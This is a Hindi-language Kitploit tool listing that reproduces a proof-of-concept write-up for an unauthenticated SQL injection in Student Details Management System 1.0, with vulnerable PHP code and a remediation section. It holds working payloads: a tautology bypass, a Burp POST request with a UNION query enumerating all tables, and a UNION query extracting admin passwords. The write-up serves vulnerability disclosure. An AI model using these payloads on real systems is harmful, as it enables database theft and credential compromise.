Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10110-SQLi — प्रमाण-अवधारणा (Proof-of-Concept) Student Details Management System 1.0 में बिना प्रमाणीकरण के SQL इंजेक्शन के लिए, जो UNION-आधारित डेटा निष्कर्षण और क्रेडेंशियल चोरी का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-10110-sqli
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubxmyronn/cve-2026-10110-sqli

CVE-2026-10110-SQLi

प्रमाण-अवधारणा (Proof-of-Concept) Student Details Management System 1.0 में बिना प्रमाणीकरण के SQL इंजेक्शन के लिए, जो UNION-आधारित डेटा निष्कर्षण और क्रेडेंशियल चोरी का प्रदर्शन करता है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

छात्र विवरण प्रबंधन प्रणाली 1.0 - SQL इंजेक्शन (बिना प्रमाणीकरण)

भेद्यता जानकारी

फ़ील्डविवरण
उत्पादछात्र विवरण प्रबंधन प्रणाली
विक्रेताcode-projects.org
संस्करण1.0
भेद्यता प्रकारSQL इंजेक्शन (CWE-89)
CVE IDलंबित
CVSS स्कोर9.8 गंभीर (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
प्रमाणीकरण आवश्यकनहीं
प्रभावित फ़ाइल/SMS/index.php
भेद्य पैरामीटरroll (POST)

विवरण

छात्र विवरण प्रबंधन प्रणाली 1.0 की index.php फ़ाइल में एक गंभीर SQL इंजेक्शन भेद्यता मौजूद है। POST अनुरोध के माध्यम से पारित roll पैरामीटर को बिना किसी सैनिटाइज़ेशन, इनपुट सत्यापन, या तैयार स्टेटमेंट (prepared statements) के उपयोग के सीधे एक कच्चे SQL क्वेरी में जोड़ा जाता है। यह एक बिना प्रमाणीकरण वाले दूरस्थ हमलावर को मनमाना SQL इंजेक्ट करने और UNION-आधारित डेटा निष्कर्षण करने की अनुमति देता है, जिससे क्रेडेंशियल तालिकाओं सहित संपूर्ण डेटाबेस सर्वर को डंप किया जा सकता है।

यह भेद्यता सार्वजनिक रूप से सुलभ छात्र खोज फ़ॉर्म पर मौजूद है, जिसके लिए शून्य प्रमाणीकरण की आवश्यकता होती है।


भेद्य कोड

फ़ाइल: index.php (पंक्तियाँ 51–59)

root@kitploit:~
include('dbcon.php');
if (isset($_POST['show'])) {

    $Standard = $_POST['standard'];
    $RollNo = $_POST['roll'];

    $sql = "SELECT * FROM `student` WHERE `standard` = '$Standard' OR `rollno`='$RollNo'";

    $result = mysqli_query($conn,$sql);

$Standard और $RollNo दोनों को बिना किसी एस्केपिंग या पैरामीटराइज़ेशन के सीधे $_POST से लिया जाता है। हमलावर SQL स्ट्रिंग संदर्भ से बाहर निकलने और मनमानी क्वेरी इंजेक्ट करने के लिए roll पैरामीटर को नियंत्रित करता है।


प्रमाण की अवधारणा (Proof of Concept)

चरण 1 — सामान्य व्यवहार की पुष्टि करें

एप्लिकेशन के होम पेज पर नेविगेट करें और एक मान्य रोल नंबर दर्ज करें:

root@kitploit:~
http://<TARGET>/SMS/index.php

रोल नंबर फ़ील्ड में 1001 दर्ज करें → एप्लिकेशन सामान्य रूप से छात्र रिकॉर्ड लौटाता है।

Screenshot 2026-05-03 220510

चरण 2 — SQL त्रुटि ट्रिगर करें (इंजेक्शन बिंदु की पुष्टि करें)

रोल नंबर फ़ील्ड में एक एकल उद्धरण ' दर्ज करें और SHOW INFO पर क्लिक करें।

परिणाम: MariaDB एक घातक त्रुटि फेंकता है जो कच्ची SQL क्वेरी और फ़ाइल पथ को उजागर करती है:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near '"' at line 1 in 
C:\xampp\htdocs\STUDENT_DETAILS_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\SMS\index.php:59
Screenshot 2026-05-03 220533

चरण 3 — प्रमाणीकरण बाईपास / पूर्ण तालिका डंप

पेलोड:

root@kitploit:~
' or 1=1 -- -

परिणाम: डेटाबेस में सभी छात्र रिकॉर्ड बिना किसी मान्य रोल नंबर के लौटाए जाते हैं, जो पुष्टि करता है कि इंजेक्शन शोषण योग्य है।

Screenshot 2026-05-03 220550

चरण 4 — UNION-आधारित निष्कर्षण (पूर्ण डेटाबेस गणना)

Burp Suite अनुरोध:

root@kitploit:~
POST /STUDENT_DETAILS_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/SMS/index.php HTTP/1.1
Host: 192.168.0.9
Content-Type: application/x-www-form-urlencoded

roll=1001' union select null,null,table_name,null,null,null,null from information_schema.tables -- -&standard=SELECT+STANDARD&show=SHOW+INFO

परिणाम: name कॉलम (UNION में स्थिति 3) MySQL इंस्टेंस पर सभी डेटाबेसों में हर तालिका का नाम वापस दर्शाता है — जिसमें admin, global_priv, users, mysql.user और उसी XAMPP इंस्टेंस पर स्थापित कई अन्य एप्लिकेशनों की क्रेडेंशियल तालिकाएँ शामिल हैं।

Screenshot 2026-05-03 220606

चरण 5 — विशेषाधिकार वृद्धि पथ

डंप उसी सर्वर पर अन्य डेटाबेसों से admin, users, global_priv और tbl_admin सहित संवेदनशील तालिकाओं को प्रकट करता है। एक हमलावर निम्नलिखित के साथ क्रेडेंशियल निकाल सकता है:

root@kitploit:~
roll=1' union select null,null,password,null,null,null,null from admin-- -

विस्तृत त्रुटि आउटपुट (चरण 2) के साथ संयुक्त, पूर्ण फ़ाइल पथ प्रकटीकरण की भी पुष्टि होती है:

root@kitploit:~
C:\xampp\htdocs\STUDENT_DETAILS_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\SMS\index.php

प्रभाव

  • पूर्ण डेटाबेस गणना सर्वर पर सभी डेटाबेसों में (केवल लक्षित एप्लिकेशन ही नहीं)
  • व्यवस्थापक क्रेडेंशियल निष्कर्षण admin तालिका डंप के माध्यम से
  • पूर्ण पथ प्रकटीकरण विस्तृत SQL त्रुटि आउटपुट के माध्यम से
  • कोई प्रमाणीकरण आवश्यक नहीं — खोज पृष्ठ पर किसी भी बिना प्रमाणीकरण वाले आगंतुक द्वारा शोषण योग्य
  • संभावित विशेषाधिकार वृद्धि उसी MySQL इंस्टेंस को साझा करने वाले अन्य एप्लिकेशनों तक

उपचार (Remediation)

बाध्य पैरामीटरों के साथ तैयार स्टेटमेंट (prepared statements) का उपयोग करें:

root@kitploit:~
$stmt = $conn->prepare("SELECT * FROM `student` WHERE `standard` = ? OR `rollno` = ?");
$stmt->bind_param("ss", $Standard, $RollNo);
$stmt->execute();
$result = $stmt->get_result();

इसके अतिरिक्त, उत्पादन में php.ini में display_errors = Off सेट करके विस्तृत PHP/MySQL त्रुटि आउटपुट अक्षम करें।


संदर्भ

  • विक्रेता होमपेज
  • CWE-89: SQL इंजेक्शन
  • OWASP SQL इंजेक्शन

खोजकर्ता

शोधकर्ता: इमाद अल्वी

टूल डाउनलोड करें